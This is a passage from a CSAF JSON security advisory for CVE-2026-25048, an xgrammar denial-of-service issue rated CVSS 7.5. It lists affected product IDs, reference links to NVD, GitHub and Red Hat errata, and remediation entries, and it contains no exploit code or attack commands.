                    "CSAFPID-3079518",
                    "CSAFPID-3079519",
                    "CSAFPID-3079520",
                    "CSAFPID-3079521",
                    "CSAFPID-3079522",
                    "CSAFPID-3079523",
                    "CSAFPID-3079524",
                    "CSAFPID-3079525",
                    "CSAFPID-3079526",
                    "CSAFPID-3079527",
                    "CSAFPID-3079528",
                    "CSAFPID-3079529",
                    "CSAFPID-3079530",
                    "CSAFPID-3079531",
                    "CSAFPID-3079532",
                    "CSAFPID-3079533",
                    "CSAFPID-3079534",
                    "CSAFPID-3101527",
                    "CSAFPID-3235103",
                    "CSAFPID-3235104",
                    "CSAFPID-5765229",
                    "CSAFPID-5765230",
                    "CSAFPID-5765231",
                    "CSAFPID-5765232",
                    "CSAFPID-5765233",
                    "CSAFPID-5765234",
                    "CSAFPID-5765235",
                    "CSAFPID-5765236",
                    "CSAFPID-5765237",
                    "CSAFPID-5765238",
                    "CSAFPID-5765239"
                ]
            },
            "references": [
                {
                    "category": "external",
                    "summary": "Source - nvd",
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25048"
                },
                {
                    "category": "external",
                    "summary": "Source raw - nvd",
                    "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-25048"
                },
                {
                    "category": "external",
                    "summary": "Source - cveprojectv5",
                    "url": "https://www.cve.org/CVERecord?id=CVE-2026-25048"
                },
                {
                    "category": "external",
                    "summary": "Source raw - cveprojectv5",
                    "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/25xxx/CVE-2026-25048.json"
                },
                {
                    "category": "external",
                    "summary": "Source - github",
                    "url": "https://github.com/advisories/GHSA-7rgv-gqhr-fxg3"
                },
                {
                    "category": "external",
                    "summary": "Source raw - github",
                    "url": "https://api.github.com/advisories/GHSA-7rgv-gqhr-fxg3"
                },
                {
                    "category": "external",
                    "summary": "Source - redhat",
                    "url": "https://access.redhat.com/security/cve/CVE-2026-25048"
                },
                {
                    "category": "external",
                    "summary": "Source raw - redhat",
                    "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25048.json"
                },
                {
                    "category": "external",
                    "summary": "Source - osv",
                    "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/PyPI%2FGHSA-7rgv-gqhr-fxg3.json?alt=media"
                },
                {
                    "category": "external",
                    "summary": "Source - first",
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25048"
                },
                {
                    "category": "external",
                    "summary": "Source raw - first",
                    "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0"
                },
                {
                    "category": "external",
                    "summary": "Source - first",
                    "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0"
                },
                {
                    "category": "external",
                    "summary": "Source - redhat",
                    "url": "https://access.redhat.com/hydra/rest/securitydata/csaf/RHSA-2026:5809.json"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv; redhat",
                    "url": "https://github.com/mlc-ai/xgrammar/releases/tag/v0.1.32"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv; redhat",
                    "url": "https://github.com/mlc-ai/xgrammar/security/advisories/GHSA-7rgv-gqhr-fxg3"
                },
                {
                    "category": "external",
                    "summary": "Reference - github",
                    "url": "https://github.com/advisories/GHSA-7rgv-gqhr-fxg3"
                },
                {
                    "category": "external",
                    "summary": "Reference - github; osv; redhat",
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25048"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://www.cve.org/CVERecord?id=CVE-2026-25048"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://access.redhat.com/security/cve/CVE-2026-25048"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444840"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://access.redhat.com/errata/RHSA-2026:5809"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://access.redhat.com/security/cve/CVE-2025-68131"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://access.redhat.com/security/cve/CVE-2025-69227"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://access.redhat.com/security/cve/CVE-2025-69228"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://access.redhat.com/security/cve/CVE-2026-28356"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://access.redhat.com/security/cve/CVE-2026-32981"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://access.redhat.com/security/updates/classification/"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://www.redhat.com/en/products/ai/inference-server"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_5809.json"
                }
            ],
            "remediations": [
                {
                    "category": "mitigation",
                    "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
                    "product_ids": [
                        "CSAFPID-1439279",
                        "CSAFPID-2858641",
                        "CSAFPID-2858642",
                        "CSAFPID-2858643",
                        "CSAFPID-3112098",
                        "CSAFPID-5119808",
                        "CSAFPID-5119810",
                        "CSAFPID-5119811",
                        "CSAFPID-5119813",
                        "CSAFPID-5198605",
                        "CSAFPID-5198606",
                        "CSAFPID-5205180",
                        "CSAFPID-5206383",
                        "CSAFPID-5206384",
                        "CSAFPID-5206388",
                        "CSAFPID-5206389",
                        "CSAFPID-5206390"
                    ]
                },
                {
                    "category": "vendor_fix",
                    "details": "For more information visit https://access.redhat.com/errata/RHSA-2026:5809",
                    "product_ids": [
                        "CSAFPID-5277237",
                        "CSAFPID-5912784"
                    ],
                    "restart_required": {
                        "category": "none"
                    },
                    "url": "https://access.redhat.com/errata/RHSA-2026:5809"
                },
                {
                    "category": "workaround",
                    "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
                    "product_ids": [
                        "CSAFPID-5277237",
                        "CSAFPID-5912784"
                    ]
                }
            ],
            "scores": [
                {
                    "cvss_v3": {
                        "version": "3.1",
                        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                        "baseScore": 7.5,
                        "baseSeverity": "HIGH"
                    },
                    "products": [
                        "CSAFPID-1439279",
                        "CSAFPID-2858641",
                        "CSAFPID-2858642",
                        "CSAFPID-2858643",
                        "CSAFPID-3079514",
                        "CSAFPID-3079515",
                        "CSAFPID-3079516",
                        "CSAFPID-3079517",
                        "CSAFPID-3079518",
                        "CSAFPID-3079519",
                        "CSAFPID-3079520",
                        "CSAFPID-3079521",
                        "CSAFPID-3079522",
                        "CSAFPID-3079523",
                        "CSAFPID-3079524",
                        "CSAFPID-3079525",
                        "CSAFPID-3079526",
                        "CSAFPID-3079527",
                        "CSAFPID-3079528",
                        "CSAFPID-3079529",
                        "CSAFPID-3079530",
                        "CSAFPID-3079531",
                        "CSAFPID-3079532",
                        "CSAFPID-3079533",
                        "CSAFPID-3079534",
                        "CSAFPID-3101527",
                        "CSAFPID-3112098",
                        "CSAFPID-3235103",
                        "CSAFPID-3235104",
                        "CSAFPID-5119808",
                        "CSAFPID-5119810",
                        "CSAFPID-5119811",
                        "CSAFPID-5119813",
                        "CSAFPID-5198605",
                        "CSAFPID-5198606",
                        "CSAFPID-5205180",
                        "CSAFPID-5206383",
                        "CSAFPID-5206384",
                        "CSAFPID-5206388",
                        "CSAFPID-5206389",
                        "CSAFPID-5206390",
                        "CSAFPID-5762372",
                        "CSAFPID-5765229",
                        "CSAFPID-5765230",
                        "CSAFPID-5765231",
                        "CSAFPID-5765232",
                        "CSAFPID-5765233",
                        "CSAFPID-5765234",
                        "CSAFPID-5765235",
                        "CSAFPID-5765236",
                        "CSAFPID-5765237",
                        "CSAFPID-5765238",
                        "CSAFPID-5765239"
                    ]
                }
            ],
            "title": "CVE-2026-25048"
        }
    ]
}